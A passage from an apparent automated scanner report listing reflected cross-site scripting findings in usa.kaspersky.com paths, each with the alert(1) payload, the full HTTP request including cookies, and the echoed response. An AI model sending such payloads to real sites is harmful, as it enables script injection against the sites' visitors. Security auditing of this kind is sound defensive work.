HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387717"
Content-Type: text/html; charset=utf-8
Content-Length: 37540
Date: Sun, 23 Oct 2011 16:35:23 GMT
X-Varnish: 1652563752
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sitesd8c6d"><script>alert(1)</script>1bca9c0c0c/usa.kaspersky.com/files/css_injector_143.css?3" />
...[SNIP]...

1.48. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5727"-alert(1)-"7f740f6e61d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitese5727"-alert(1)-"7f740f6e61d/usa.kaspersky.com/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387734"
Content-Type: text/html; charset=utf-8
Content-Length: 39506
Date: Sun, 23 Oct 2011 16:35:40 GMT
X-Varnish: 1652565073
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitese5727"-alert(1)-"7f740f6e61d/usa.kaspersky.com/files/css_injector_143.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.49. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ace"><script>alert(1)</script>bec8bb4acea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com26ace"><script>alert(1)</script>bec8bb4acea/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387768"
Content-Type: text/html; charset=utf-8
Content-Length: 37522
Date: Sun, 23 Oct 2011 16:36:16 GMT
X-Varnish: 1652566502
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com26ace"><script>alert(1)</script>bec8bb4acea/files/css_injector_143.css?3" />
...[SNIP]...

1.50. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63551"-alert(1)-"6631431a643 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com63551"-alert(1)-"6631431a643/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387791"
Content-Type: text/html; charset=utf-8
Content-Length: 38720
Date: Sun, 23 Oct 2011 16:36:35 GMT
X-Varnish: 1652567744
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com63551"-alert(1)-"6631431a643/files/css_injector_143.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.51. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a54eb"-alert(1)-"d6042cb5076 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/filesa54eb"-alert(1)-"d6042cb5076/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387829"
Content-Type: text/html; charset=utf-8
Content-Length: 40324
Date: Sun, 23 Oct 2011 16:37:14 GMT
X-Varnish: 1652569635
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesa54eb"-alert(1)-"d6042cb5076/css_injector_143.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.52. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458a8"><script>alert(1)</script>6ec87230500 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files458a8"><script>alert(1)</script>6ec87230500/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387810"
Content-Type: text/html; charset=utf-8
Content-Length: 40475
Date: Sun, 23 Oct 2011 16:36:55 GMT
X-Varnish: 1652568800
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files458a8"><script>alert(1)</script>6ec87230500/css_injector_143.css?3" />
...[SNIP]...

1.53. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3512c"-alert(1)-"148586c319a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/css_injector_143.css3512c"-alert(1)-"148586c319a?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387869"
Content-Type: text/html; charset=utf-8
Content-Length: 39279
Date: Sun, 23 Oct 2011 16:37:52 GMT
X-Varnish: 1652571684
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css3512c"-alert(1)-"148586c319a?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.54. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e25"><script>alert(1)</script>540a02d78bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_143.css47e25"><script>alert(1)</script>540a02d78bf?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387855"
Content-Type: text/html; charset=utf-8
Content-Length: 37875
Date: Sun, 23 Oct 2011 16:37:37 GMT
X-Varnish: 1652570960
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css47e25"><script>alert(1)</script>540a02d78bf?3" />
...[SNIP]...

1.55. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de1b1"-alert(1)-"b94c665e0b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesde1b1"-alert(1)-"b94c665e0b4/usa.kaspersky.com/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387650"
Content-Type: text/html; charset=utf-8
Content-Length: 39506
Date: Sun, 23 Oct 2011 16:34:36 GMT
X-Varnish: 1652559100
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitesde1b1"-alert(1)-"b94c665e0b4/usa.kaspersky.com/files/css_injector_144.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.56. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72028"><script>alert(1)</script>85413005a1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites72028"><script>alert(1)</script>85413005a1f/usa.kaspersky.com/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:32:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387573"
Content-Type: text/html; charset=utf-8
Content-Length: 37545
Date: Sun, 23 Oct 2011 16:33:25 GMT
X-Varnish: 1652555112
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites72028"><script>alert(1)</script>85413005a1f/usa.kaspersky.com/files/css_injector_144.css?3" />
...[SNIP]...

1.57. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb10"-alert(1)-"62f5664cc26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com5fb10"-alert(1)-"62f5664cc26/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387736"
Content-Type: text/html; charset=utf-8
Content-Length: 38721
Date: Sun, 23 Oct 2011 16:35:41 GMT
X-Varnish: 1652565130
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
